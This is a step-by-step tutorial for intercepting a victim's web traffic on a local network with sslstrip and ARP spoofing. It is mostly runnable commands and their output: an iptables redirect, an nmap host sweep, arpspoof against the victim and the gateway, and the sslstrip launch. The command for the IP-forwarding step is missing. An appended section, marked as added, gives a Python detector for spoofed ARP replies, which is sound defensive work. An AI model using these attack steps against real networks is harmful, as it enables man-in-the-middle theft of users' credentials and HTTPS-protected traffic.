sslstrip is a tool that transparently hijacks HTTP traffic on a network, watches for HTTPS links and redirects, and then maps those links into look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon that looks like a lock icon, selective logging, and session denial.
-w <filename>, --write=<filename>   Specify file to log to (optional).
-p , --post                         Log only SSL POSTs. (default)
-s , --ssl                          Log all SSL traffic to and from server.
-a , --all                          Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port>          Port to listen on (default 10000).
-f , --favicon                      Substitute a lock favicon on secure requests.
-k , --killsessions                 Kill sessions in progress.
-h                                  Print this help message.
Enable IP Forwarding
To allow traffic to flow through our machine, IP forwarding needs to be enabled. Open a terminal and run the following command
Add an IP Tables Rule to Redirect Traffic to SSLStrip
This adds an IP Tables rule so that our machine knows how to handle incoming traffic from the victim. The following rule will take any traffic originally destined for port 80 (HTTP, web traffic) and redirect it to port 8080, which SSLStrip will be running on.
root@cyborg:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Identify Target and Gateway IP Addresses
root@cyborg:~# nmap -sP -T4 192.168.1.1/24
This is where the meat of the attack takes place. Address Resolution Protocol, or ARP, is what is responsible for mapping IP addresses to MAC addresses. These mappings are stored in an ARP table on each machine connected to the network.
The ARP spoofing attack sends out false information to the machine you’re attacking, repeatedly telling it that the gateway IP address has changed. The IP address we give it is that of your machine. So now the victim thinks that you are the gateway, and will send all of its outgoing traffic to you!
We also need to ARP spoof the gateway, to make it think that you are the victim’s machine. By doing this attack, you are essentially becoming the Man In The Middle.
To ARP Spoof the victim:
arpspoof -i <interface> -t <target IP> <gateway IP>
root@cyborg:~# arpspoof -i eth0 -t 192.168.1.18 192.168.1.1
0:e0:4c:37:0:93 18:67:b0:27:e5:15 0806 42: arp reply 192.168.1.1 is-at 0:e0:4c:37:0:93
0:e0:4c:37:0:93 18:67:b0:27:e5:15 0806 42: arp reply 192.168.1.1 is-at 0:e0:4c:37:0:93
To ARP Spoof the gateway router:
arpspoof -i <interface> -t <gateway IP> <target IP>
root@cyborg:~# arpspoof -i eth0 -t 192.168.1.1 192.168.1.18
0:e0:4c:37:0:93 0:26:15:67:e6:c3 0806 42: arp reply 192.168.1.18 is-at 0:e0:4c:37:0:93
0:e0:4c:37:0:93 0:26:15:67:e6:c3 0806 42: arp reply 192.168.1.18 is-at 0:e0:4c:37:0:93
Run these commands in their own separate terminal tabs so that you can flick between them and monitor each one.
root@cyborg:~# sslstrip -k -l 8080
sslstrip 0.9 by Moxie Marlinspike running...
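The "arp reply ... is-at ..." lines printed by arpspoof above are also what a defender can watch for: a single MAC address starts answering for both the gateway and a host, contradicting the bindings seen before. The Python below is an added example, not part of the original page or of the sslstrip/arpspoof tools; the function names, the trusted-binding table (read from the destination-MAC column of the output above and assumed to be the legitimate bindings) and the sample capture are constructed for illustration.

```python
import re
from collections import defaultdict

# Line format printed by arpspoof: "<src mac> <dst mac> 0806 42: arp reply <ip> is-at <mac>"
ARP_REPLY = re.compile(
    r"arp reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) "
    r"is-at (?P<mac>[0-9a-fA-F]{1,2}(?::[0-9a-fA-F]{1,2}){5})\s*$"
)

def norm_mac(mac):
    """Zero-pad octets so 0:e0:4c:37:0:93 equals 00:e0:4c:37:00:93."""
    return ":".join(f"{int(octet, 16):02x}" for octet in mac.split(":"))

def find_arp_anomalies(lines, trusted):
    """Flag replies that contradict trusted IP->MAC bindings, and MACs claiming >1 IP."""
    trusted = {ip: norm_mac(mac) for ip, mac in trusted.items()}
    claims = defaultdict(set)          # MAC -> set of IPs it has claimed
    alerts = []
    for line in lines:
        m = ARP_REPLY.search(line)
        if not m:
            continue                   # not an ARP reply line
        ip, mac = m["ip"], norm_mac(m["mac"])
        claims[mac].add(ip)
        expected = trusted.get(ip)
        alert = ("rebind", ip, expected, mac)
        if expected and expected != mac and alert not in alerts:
            alerts.append(alert)       # repeated spoofed replies alert only once
    for mac, ips in sorted(claims.items()):
        if len(ips) > 1:               # can be benign (proxy ARP), so treat as a lead
            alerts.append(("multi-ip", mac, sorted(ips)))
    return alerts

# Assumed-legitimate bindings, taken from the destination-MAC column of the page's output.
TRUSTED = {"192.168.1.1": "0:26:15:67:e6:c3", "192.168.1.18": "18:67:b0:27:e5:15"}

# Constructed capture: one legitimate reply, then the two spoofed replies from the page.
SAMPLE = [
    "0:26:15:67:e6:c3 18:67:b0:27:e5:15 0806 42: arp reply 192.168.1.1 is-at 0:26:15:67:e6:c3",
    "0:e0:4c:37:0:93 18:67:b0:27:e5:15 0806 42: arp reply 192.168.1.1 is-at 0:e0:4c:37:0:93",
    "0:e0:4c:37:0:93 18:67:b0:27:e5:15 0806 42: arp reply 192.168.1.1 is-at 0:e0:4c:37:0:93",
    "0:e0:4c:37:0:93 0:26:15:67:e6:c3 0806 42: arp reply 192.168.1.18 is-at 0:e0:4c:37:0:93",
]

if __name__ == "__main__":
    for alert in find_arp_anomalies(SAMPLE, TRUSTED):
        print(alert)
```

On a managed network the same two checks are what switch-level dynamic ARP inspection or a static ARP entry for the gateway enforce, instead of only reporting.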